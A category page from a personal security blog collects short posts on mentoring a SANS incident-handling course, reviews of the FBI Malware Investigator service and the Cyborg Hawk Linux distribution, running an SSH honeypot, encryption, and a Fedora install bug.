now browsing by category
I will be acting as a Mentor for the SANS SEC504 class
I am pleased to announce that I will be acting as a Mentor for the SANS SEC504 class ( Hacker Tools, Techniques, Exploits and Incident Handling ), coming up in February 2016
What has me most excited, is the format of the class, and the whole Mentor program. The mentor program is great for students who prefer or are forced to study on their own, as opposed to sitting in a 5-day class. How the class format works, is students are responsible for studying the material, and the class meets once a week for a group session of studying, or answering questions. I am available to students for over 10 weeks, to assist in studying, and answering questions. I see this as a huge positive, as many of us in the industry are, we are self-learners, and we have taught ourselves to learn on our own. The SANS Mentor program, is a perfect example on learning on your own, and moving at a decently rapid pace.
I am extremely excited to get the opportunity to work with SANS, on this fun and exciting course. It has been my favorite SANS course I’ve attended, and it will be exciting to get to mentor future students in the class and help them on their way to become a SANS GIAC Certified Incident Handler (GCIH).
From the GCIH information page:
Incident handlers manage security incidents by understanding common attack techniques, vectors and tools as well as defending against and/or responding to such attacks when they occur. The GCIH certification focuses on detecting, responding, and resolving computer security incidents and covers the following security techniques:
- The steps of the incident handling process
- Detecting malicious applications and network activity
- Common attack techniques that compromise hosts
- Detecting and analyzing system and network vulnerabilities
- Continuous process improvement by discovering the root causes of incidents
From the SANS SEC504 page:
The Internet is full of powerful hacking tools and bad guys using them extensively. If your organization has an Internet connection or one or two disgruntled employees (and whose doesn’t!), your computer systems will get attacked. From the five, ten, or even one hundred daily probes against your Internet infrastructure to the malicious insider slowly creeping through your most vital information assets, attackers are targeting your systems with increasing viciousness and stealth. As defenders, it is essential we understand these hacking tools and techniques.
By helping you understand attackers’ tactics and strategies in detail, giving you hands-on experience in finding vulnerabilities and discovering intrusions, and equipping you with a comprehensive incident handling plan, this course helps you turn the tables on computer attackers. It addresses the latest cutting-edge insidious attack vectors, the “oldie-but-goodie” attacks that are still prevalent, and everything in between. Instead of merely teaching a few hack attack tricks, this course provides a time-tested, step-by-step process for responding to computer incidents, and a detailed description of how attackers undermine systems so you can prepare, detect, and respond to them. In addition, the course explores the legal issues associated with responding to computer attacks, including employee monitoring, working with law enforcement, and handling evidence. Finally, students will participate in a hands-on workshop that focuses on scanning for, exploiting, and defending systems. It will enable you to discover the holes in your system before the bad guys do!
The course is particularly well-suited to individuals who lead or are a part of an incident handling team. General security practitioners, system administrators, and security architects will benefit by understanding how to design, build, and operate their systems to prevent, detect, and respond to attacks.
I have been steadily using Malware Investigator since its public debut in early March of 2015.
I have grown more and more upset with the service over this time period, and in the end, I’ve realized its not providing me any more of a service, than what is being provided via cuckoo, virus total, or malwr. Furthermore, even with some of the early on problems faced by malwr, I still believe that malwr is more available than the Malware Investigator tool is.
Problems experienced using Malware Investigator:
1) Downtime – Their servers are often down outside normal business hours, and even down sometimes during business hours. Often times, the SAML authentication that occurs between the InfraGard website and Malware Investigator fails, or I get redirected to various error pages at Malware Investigator.
2) Processing Time – It often takes an insane amount of time to analyze my traffic. For the majority of the malware that I have submitted to their website, I would guess that the mean time to analyze is approaching a week and a half. I feel that they should have enough resources at their disposal to process malware faster than 1.5 weeks.
3) Correlations – This is the part that really got me excited to use Malware Investigator. However, it seems as if it is a little bit of a misnomer. I had thought, that it would allow me to compare the malware I find, and compare it to other malware used in higher profile breaches / incidents, and it would alert me to that (with a certain level of discretion of course, understanding different classification levels of information provided by the FBI). Unfortunately, correlations generally gives you the ability to see other usernames of people that have uploaded that same piece of malware.
4) General Brokenness –
a) My profile has become littered with malware that I never submitted. There are a number of .dll files littering my screen that has had analysis performed against it (supposedly), that I never submitted.
b) I can’t get the proper listing of malware that I submitted to the site, unless I happen to remember the name of the malware that I submitted. The general overview, where you should be able to browse all the malware you submitted, however, that is completely broken for me, and the only way to find the malware I submitted, is if I happen to remember the name of the malware that I submitted; so it seems the search process still works, however, the listing of malware doesn’t.
I will point out, the single feature I like at Malware Investigator, and the only reason I still use it. I use it to analyze all the linux, unix, mips, and other non-windows malware that I am able to collect. That is the single weakness of both malwr and VirusTotal, is that they will not, or maybe properly said, do not have the ability to analyze the various linux/unix/mips/whatever malware variants that I upload.
So, with all these problems I have experienced, I ask the question, “How broken is Malware Investigator?” And, “Is Malware Investigator broken beyond belief?”
Do you think that malwr and VT should start accepting, and being able to process linux malware, or does it represent such a low number of infections, that it would be going too far? Let me know, by posting a comment down below.
Please leave a comment, let me know if you use Malware Investigator, if you don’t, and why; I want to hear other peoples reaction to Malware Investigator.
This was a relatively easy challenge, but it was really fun, using some of my IR analyst skills to analyze pcaps and so on. I would rate this as being a very easy/beginner level challenge, but fun, nonetheless.
(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)(– SPOILER ALERT –)
Read the rest of this page »
Packt Publishing “Free Learning” is giving away books, from yesterday, April 30th – May 17th. Make sure you check Packt Publishing daily and get a copy of a free book.
So, several months ago, I wrote about a tool that the FBI was going to make available for members of InfraGard, called Malware Investigator. This tool was set to provide members of law enforcement, and InfraGard to provide analysis on submitted malware. I said that I would provide a detailed write-up, regarding how useful the tool is, and how it helps me analyze found malware. I am happy to do that for you here; here is my review of Malware Investigator.
I submitted 3 malware samples, that I found via my SSH honeypot. Granted, these samples were compiled for execution on a MIPS based system, so all the other malware analysis tools proved to be relatively worthless, as most of them are only setup to run w32 (windows) binaries, and test the execution of that malware. I submitted these samples on 4/20, one at approx. 7:30 AM MDT, and the other two, later in the day, approx. 4:30 PM MDT.
As I am writing this post, on 4/23, at approx. 9:45 AM MDT, the analysis of all three files is still incomplete. To me, since these are sort of odd-ball files to submit (again, they are MIPS executables), I think a day is a reasonable amount of time to run the malware in a sandbox, and provide a report. However, at 3 days, and still going, I think this sort of analysis is taking far too long, for the service to be useful for malware hunters out there.
Depending on the output, and if it ever completes, I may, or may not provide a follow-up to this article, detailing how accurate the malware analysis at Malware Investigator was; it is something to write about.
The positive analysis of the files (just one included here) is that it does provide some initial decent details; however, what I’m really curious about, is attribution and correlation that the FBI provides me with (if any).
Read the rest of this page »
I downloaded a copy of Cyborg Hawk Linux 1.1 several weeks ago, and unfortunately didn’t get around to actually installing it, and using it until today.
My very first impressions were about how “beautiful” the desktop; but that is about where the beauty ends.
So, on to my use of it:
There are a bunch of tools on there, a bunch of tools that I’m not familiar with, and that aren’t in Kali Linux. I visit Cyborg Hawk Linux’s homepage, to read what documentation and tutorials they have on their website, and the pages they link to, are down (see here). There are several pages up in their “Documentation” section, so I peruse through there for a bit, not really finding the info I needed. I will come back later, to the tools I’m unfamiliar with, and put in the manual research time for those.
Launching tools that I’ve either used before, or actually have a pressing need to examine (I’ve got some malware samples, that I really want to take a look at), I try and launch Cuckoo, and it fails. I’m not extremely familiar with any of the other tools, but again, I will return to those, once I can read up on them, and learn how to use them.
Now headed off to tools, that I’m extremely familiar with, including metasploit. Launch the metasploit service, then attempt to update the modules, and it fails. Attempt to register the service, and it fails, and I’m therefore unable to update/use metasploit.
So far, in a couple hours of using, all this distro has going for it, is a pretty interface, and a lot of tools. As I mentioned earlier, I will dig into those tools, as soon as I have time to search, and lookup what each of them does. Overall, not very impressed with Cyborg Hawk Linux 1.1.
Decided I would set up a SSH honeypot, for a bunch of reasons, and not only to poke the bear.
If you’re not familiar with what a ssh honeypot is, it is a “virtual” environment setup to replicate a ssh server, and once in, it replicates the basic look and feel of a server you would ssh into. In my example, it gives the basic outward appearance of a Debian server. Once the “bad guy” logs in, it logs all his activity, everything he tries to put on the server, everything he tries to take off the server, and it logs all the commands that he types (or has scripted out). I’m extremely interested to see what these “bad guys” are doing.
I can’t say for certain why I wanted to setup a honeypot server, more than I want to see what an attacker would do, once he gets inside the system. In the day that I’ve had the server up, that password has been guessed several times, however, no attacks have been made against the server, no login besides the initial brute force connect, to attempt to break-in to the server. So nothing really to report on, as of yet; but I am truly interested in the attacks that occur against my server, after someone logs in, and starts doing something.
There is also another pretty good looking utility to go along with the Kippo SSH honeypot, called Kippo-Graph, which presents me with the data from the honeypot, in a nice, easy to read web page format. It also has a nice little interface that steps through all the commands the “bad guy” types, and displays it with amazing detail. So, I’m also pretty excited about that.
I will report back, once I have some solid data collected, and something more happens besides the initial brute force attempt. Here’s to running an ssh honeypot. . .
It should be noted, that it would make sense to have a pretty good idea what you’re getting into, when you’re setting up a ssh honeypot. As in the title, I’m not simply doing it to poke the bear, but I want to gain the understanding of what an attacker is doing, once they see an available ssh host (ssh honeypot).
I use encryption in nearly aspect of my life. Some uses are more effective than others, admittedly, however, there is encryption everywhere. For an example:
My Android phone is encrypted
My computer’s partitions are LUKS encrypted
The website you’re reading this on, is encrypted
Encryption is an integral part of life, in assuring both security and integrity of my website, my emails, and pretty much everything I do in life. I don’t partake in any criminal acts, but I still don’t want anyone to be able to view my data, if I don’t want them to.
I found this excellent article over at TED, discussing why you should care about encryption too.
So why does encryption matter, anyway?
Well, some would have you believe that encryption is a tool for the “bad guys,” enabling terrorists to have an easy way of plotting their next crimes. In reality, banning encryption won’t stop terror attacks or end religious extremism. But such a ban could stifle democratic movements, scuttle online security, and undermine our open society.
It was a fun little challenge, and I definitely want to give me thanks to the Infosec Institute for putting out, such a fun CTF challenge!
You can also visit the page, if you got stumped with a challenge, and you didn’t like any of my solutions, you can see everything that other people wrote on the challenge, and judge for yourself.
Nothing is more frustrating, than a researcher, programmer, tester, or any other similar position attempting to document a bug, and when attempting to re-create the situation, you are unable to replicate. Testing a theory about a bad installer in Fedora 21 today, and just my luck, I was unable to reproduce the problem I was encountering on my desktop, in my virtual environment.
I spent this last weekend, attempting to install/re-install the latest Fedora Linux release. I have already backed up all my data, and done everything I need to do, in order to prep for the re-install. I figure my situation is not super unique, but probably a little more complicated than the average users’ install.
Read the rest of this page »